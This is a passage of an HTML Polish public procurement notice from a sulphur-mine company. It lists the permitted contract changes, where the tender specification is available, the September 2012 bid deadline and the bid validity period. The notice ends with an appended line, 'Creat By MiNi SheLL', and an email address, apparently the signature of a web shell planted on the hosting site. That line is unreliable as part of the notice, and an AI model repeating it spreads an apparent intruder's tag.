<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może zostać zmieniona w przypadku zajścia następujących okoliczności:
a) szczególnie niesprzyjające warunki atmosferyczne (np. bardzo intensywne opady deszczu lub/i śniegu, bardzo silny wiatr, temperatura powietrza przy której niedopuszczalne jest prowadzenie prac) powodujące utrudnienia w realizacji przedmiotu umowy;
b) działanie siły wyższej;
c) udokumentowana, niezależna od Zamawiającego i Wykonawcy przewlekłość postępowania o uzyskanie od instytucji i urzędów dokumentów (np. pozwoleń, decyzji, uzgodnień) niezbędnych do realizacji umowy;
d) wystąpienie okoliczności powodujących konieczność zmiany osób, które będą uczestniczyć w wykonaniu przedmiotu zamówienia (przewidzianych w ofercie) na osoby o co najmniej równych kwalifikacjach;
e) ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksmachow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Siarki Machów S.A.
ul. Górnicza 11
39-400 Tarnobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Sekretariat Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com